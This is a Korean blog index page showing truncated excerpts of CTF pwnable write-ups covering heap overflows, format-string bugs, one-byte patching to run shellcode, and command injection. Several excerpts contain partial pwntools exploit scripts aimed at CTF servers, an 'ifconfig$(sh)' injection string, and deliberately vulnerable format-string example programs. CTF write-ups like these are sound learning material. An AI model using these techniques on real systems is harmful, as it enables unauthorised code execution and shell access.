System/System 문제풀이

먼저 보호기법을 살펴보면 비교적 간단하게 되어있다. 함수의 프롤로그 부분 함수의 에필로그 부분 그런데 정적분석을 하다보면 함수마다 프롤로그 에필로그 부분에 같은 코드가 계속 반복되어 있는 것을 확인 할 수 있다. 연결리스트로 연결되어 있는듯한 모습을 하고 있는데, 대략 이런식으로 연결리스트가 구성된다고 생각하면 된다. 에필로그 부분에서는 프롤로그 부분에서 힙에 저장한 ret주소가 현재도 같은지 확인을 하고 같으면 이전 함수의 구조체 주소+8에 0xDEADCD80을 다시 저장을 한다. 즉, 이 문제는 보호기법에서 canary가 없는 대신, 힙에 간단한 연결리스트를 만들고 ret값을 저장하여 ret부분이 overwrite됬는지 매 함수마다 확인을 한다고 생각하면 된다. 이 부분은 인텔에서 발표한 CET보호기..

크게 두 개의 함수가 존재한다.한개는 유저 구조체를 init하는 함수이고,한개는 이상한? 게임을 진행하고 기존의 점수보다 높으면 이름을 수정할 수 있는 그런 함수이다. 위 함수에서 이름이 저장되는 heap주소가, user_info 구조체의 힙주소보다 낮은주소에 위치한다는 것을 기억해야한닷코드를 보고 대충의 구조체를 알아낼 수 있따. score는 이상한 게임을 하는 함수를 보면 처음 4바이트에 저장되는것을 알 수 있다. 이상한 게임을 진행하는 함수의 마지막 부분인데, 여기서 취약점이 발생한다.만약 현재 score보다 높은점수를 게임을 통해 획득하면, 이름을 바꿀 수 있게되는데,malloc을 통해 기존의 name의 길이보다 더 큰 크기의 메모리를 할당 받을 수 있다.user_info 자체의 힙영역의 주소는 ..

from pwn import * import stitch local = False if local : s = remote('localhost', 8005) else : s = remote('pwn.chal.csaw.io', 8002) raw_input() def solve() : p.status('leak puts addr') s.recvuntil('>') sleep(1) s.sendline('1') puts = int(s.recvuntil('\n').split(':')[1].strip('0x'), 16) + 1280 libc = stitch.find_libc({'puts':hex(puts)[-3:]})[0] offset = puts - libc['puts'] poprdi = offset + libc['..

이거 대회끝난지 한 2주됬는데 갑자기 생각나서 올린다. 다른팀원들이 미리 풀어논게 있어서 1등이였는데 새벽에 다른팀들이 올라왔다. 나는 대회를 밤늦게 시작해서 팀원들이 풀지 않은 easy 3종 셋트를 풀었다. 2등이라도 유지해서 다행이였다. easy_fsb를 처음에 풀었는데 libc가 주어진질 모르고 조금씩조금씩 libc를 긁어서 모으고 있었다. 그러다가 공지사항을 보니 낮에 libc를 올려놨었다....... 그래서 바로 다시 오프셋을 적어서 풀었다. 그냥 전형적인 fsb문제였다. from pwn import * import stitch s = remote('prob.layer7.kr', 10002) p = log.progress('Exploiting!') if __name__ == '__main__' ..

from pwn import * import stitch local = False if local : s = remote('localhost', 9988) else : s = remote('diapers.asis-ctf.ir', 1343) raw_input() def main() : strip_ = lambda x : x.strip('0x') p = log.progress('start pwning....') p.status('select first') #to stack underflow s.recvuntil('> ') s.sendline('3') for _ in range(257) : p.status('%dth minus'%(_+1)) s.recvuntil('> ') sleep(0.1) s.sendlin..

from pwn import * import stitch local = False if local : s = remote('localhost', 9999) offset = {'read35' : 0xd5c23, 'system' : 0x3ad80, 'binsh' : 0x15ba3f} raw_input('ready!') else : s = remote('chal.cykor.kr', 20003) offset = {'read35' : 0xd4443, 'system' : 0x3a920, 'binsh' : 0x15909f} def reg_login(menu, myid, mypw) : global s s.recvuntil('\n\n') s.sendline(menu) s.recvuntil(' : ') s.sendline..

FSB예제 32bit //gcc fsb32.c -o fsb32 -m32 -mpreferred-stack-boundary=2 #include #include int main(int argc, char **argv){ char buf[128] = {0, } ; int ret_addr = (int)buf ; for(int i = 0 ; i < 2 ; i++){ fgets(buf, 128, stdin) ; printf(buf) ; memset(buf, 0, 128) ; } return 0 ; } 64bit //gcc fsb64.c -o fsb64 -mpreferred-stack-boundary=4 #include #include int main(int argc, char **argv){ char buf[1024..

헥스레이 결과를 토대로 문제를 살펴보면 위 그림에서 첫번째 mprotect함수가 실행되고 두번째 mprotect함수가 실행되기 전에 사용자가 원하는 주소의 한바이트를 바꿀 수 있는 취약점이 있다. 이를 이용해서 공격을 해야하는데 한바이트만 바꿔서는 딱히 방법이없다.그리고 aslr이 적용되어 있기때문에 고정된 주소를 이용해서 공격을 해야한다. 우선 첫번째로 함수가 바로 끝나지 않게 트리거를 시켜줄 주소를 정해서 바이트를 수정한 뒤, 적당한 주소에 쉘코드를 넣고, 다 넣은후에는 다시 쉘코드가 있는 주소를 call할 수있게끔 바이트를 수정하면 쉘코드를 실행할 수 있다. 0x400860에 add rsp, 0x48 이 있는데 rsp에는 입력한 값이 저장이 된다.따라서 오퍼랜드 값을 작게 바꿔주면 rip를 조정 할..

문제는 3개의 입력을 받는 함수와, 출력을 해주는 함수, 그리고 끝내는 함수 이렇게 5개로 이루어져있다. time_format과 time과 time_zone을 입력하고 print를 하면, system("/bin/date -d @%d +'%s'", (unsigned int)time_addr, time_format) 이 실행이 되고,'TZ'라는 환경변수에는 time_zone에 입력한 문자열이 들어간다. 여기서 나는 처음에 time_zone에 '/bin/sh'를 넣고, time_format에 `$TZ`이런식으로 환경변수를 넣어 쉘을 실행시키려고 했다.하지만 time_format을 입력할 때 필터링이 걸려있어서 넣을수가 없었다. 그런데 코드 중간중간데 getenv("DEBUG")가 있으면 자꾸 주소를 출력해주는..

문제는 우선 처음에 serial키를 맞춰야지 메뉴가 나오면서 시작된다. 따라서 serial을 우선 맞춘다음 취약점을 알아내야한다. ascii값으로 57보다 작은값이 12글자이면 오른쪽 화살표로 이동해서 값이 유효한지 확인을 한다. IDA에서 봤지만 연산과정이 복잡한건진 몰라도 핵스레이가 제대로 해석하지 못한다. 따라서 핸드레이(직접 손으로)를 통해서 serial키를 알아내야한다. 과정이 복잡한거 같지만 비슷한 과정을 반복하기 때문에 금방 serial키를 알아낼 수 있다. 1. - a == (AAAA ^ ((44204 ^ 43947 ^ 4080) + ((3855 >> 8) | (3855 11)))) 3. - c == (CCCC ^ ((4080 ^ b ^ a) + ( (b > 13)))) 4. - (((((..

이런 문제이다.직접 서버의 몇개의 명령어를 popen을 통해 실행 시킬 수 있고,user의 정보를 삽입, 수정, 확인 할 수 있다. 문제를 풀때는 insert, modify, show 쪽을 뒤져서 공격을 하려고 삽질을 많이 했다.특히 64bit고 중간에 헷갈리게 많이 해놔서 찾는데 오래 걸렸다....취약점은 명령어 중에 ifconfig를 실행하면 입력을 한번 더 받는다.이상하다. ifconfig는 보통 옵션없이 많이 쓰기 때문에 ida로 살펴 보았다. 빨간색 네모부분이 명령어를 실행 시키는 부분인데check함수에 들어가보면 여러가지 ascii문자들이 필터링 되어있다.근데 $,(,),등이 빠져있다.strcat을 이용해 ifconfig+입력한 문자열을 실행시키기 때문에ifconfig$(sh)이렇게 입력을 하..

문제 자체는 간단한 fsb문제인데, no RELRO이다. fini_array를 overwrite할 수 있다. 원하는 정보를 얻은 후 다시 main함수로 트리거할 때 fini_array 배열을 사용하면 된다. 정적분석과 동적분석을 해보면 스택의 구조는 위 그림과 같다. 나는 저기서 fsboffset 264,267부분을 이용해서 공격을 했다. fsb offset이 264인 부분을 leak한 후, -24를 하면 ebp값을 알아낼 수 있고, 267인 부분을 leak하면 실제 __libc_start_main으로 돌아가는 ret 주소를 알아 낼 수 있다. libc가 주어지므로 offset을 바로 gdb로 확인하여, system함수와 '/bin/sh/주소를 알아 낼 수 있었다. 위 과정을 통해 필요한 주소값들을 알아..